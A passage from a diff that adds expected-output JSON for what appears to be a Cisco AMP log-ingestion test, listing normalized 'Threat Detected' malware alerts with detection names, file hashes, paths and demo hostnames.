+ "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 455000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251439135752000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36447, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258981346934873", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 346000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258981346935000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 38014, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258929807327320", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258929807327000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 39333, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542427", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 470000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40652, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542426", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 112000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41978, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542425", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 71000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43297, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537367", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 532000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44622, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667841684537366", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 454000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 45948, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537365", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 80000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47266, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258118058508361", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258118058508000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 48591, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667837389570068", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 689000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667837389570000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49910, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258066518900808", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 608000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258066518901000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 51229, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258014979293255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258014979293000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 52548, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257963439685702", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257963439686000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 53867, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667579691532307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 778000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55186, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532306", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 747000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + 